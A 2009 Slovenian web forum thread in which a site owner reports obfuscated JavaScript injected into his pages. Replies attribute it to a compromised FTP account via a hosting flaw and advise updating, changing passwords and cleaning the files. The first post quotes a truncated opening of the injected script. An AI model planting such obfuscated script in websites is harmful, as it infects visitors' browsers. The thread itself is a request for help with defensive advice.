Čudna koda na mojih spletnih straneh..
 
mactron 15. mar 2009 21:45:10 Pridružen od:
1. dec 2006
1846 objav
72 13 1
#1

Kak teden nazaj sem opazil, da se mi na precej straneh pojavi neka čudna kodo.. navadno je v index fajlih in celo na straneh, kjer prevladuje čisti html, brez phpja-mysqla...



Pred dnevi sem naredil nov page (pure html), danes pa že opazim kodo.. Kdo ve zakaj hodiča gre ?



Kode nima smisla popat tukaj, ker je prdolga.. začne pa se nakako takole..



<script>function c265607b11i49b935f9bfb78(i49b935f9bff72){ function i49b935f9c036f(){return 16;} return (parseInt(i49b935f9bff72,i49b935f9c036f()));}function i49b935f9c0b68

(i49b935f9c0f68){ function i49b935f9c1b6e(){return 2;} var i4


všeč(0) ni všeč(0) spam(0)
 
carchek 15. mar 2009 22:36:37 Pridružen od:
4. maj 2008
709 objav
620 190 25
#2

Mogoče kakšen XSS Atack?


všeč(0) ni všeč(0) spam(0)
Marketing guy with ninja skills.
 
mactron 16. mar 2009 00:05:04 Pridružen od:
1. dec 2006
1846 objav
72 13 1
#3

težko na straneh, kjer je goli html, brez form.. se mi zdi, da je en hudič na na serverju..


všeč(0) ni všeč(0) spam(0)
 
Antony 16. mar 2009 06:33:39 Pridružen od:
18. maj 2008
140 objav
111 2 4
#4

Vdrli so ti preko znane napake za IE strežnike. V bistvu so dobili dostop do tvojega FTP-ja. Piši hostingu za update njihovega softweara, zamenjaj vsa gesla in pobriši dodatno kodo. Itak se pojavlja čisto na dnu in samo v index fajlih.


všeč(0) ni všeč(0) spam(0)
 
mactron 16. mar 2009 16:30:34 Pridružen od:
1. dec 2006
1846 objav
72 13 1
#5

aha hvala...bom naredil, kot si rekel..sicer pa imam za vsako domeno svoj FTP oz. password!


všeč(0) ni všeč(0) spam(0)
 
had 17. mar 2009 05:34:16 Pridružen od:
24. nov 2006
1865 objav
756 519 55
#6

ampak google tega nima rad.. meni se je to zgodilo na wordpressu in sem kot keks odletel iz indeksa..



in ja, tudi "plain" html je bil okuzen :(


všeč(0) ni všeč(0) spam(0)
 
Antony 17. mar 2009 06:35:14 Pridružen od:
18. maj 2008
140 objav
111 2 4
#7

Mactron, če imaš vse pri enem ponudniku se je lahko zgodilo, da so dobili dostop do roota (sicer ne poznam podrobnosti).

Drugače pa, kot je rekel had, ti recimo googlov brskalnik chrom tako stran blokira. Po svoje je pohvalno, da se je Google tako hitro odzval na te vdore, saj je posledično zmanjšal število okuženih uporabnikov.


všeč(0) ni všeč(0) spam(0)
 
 

🔒 Za odgovor na to temo se moraš prijaviti.

Prijavi se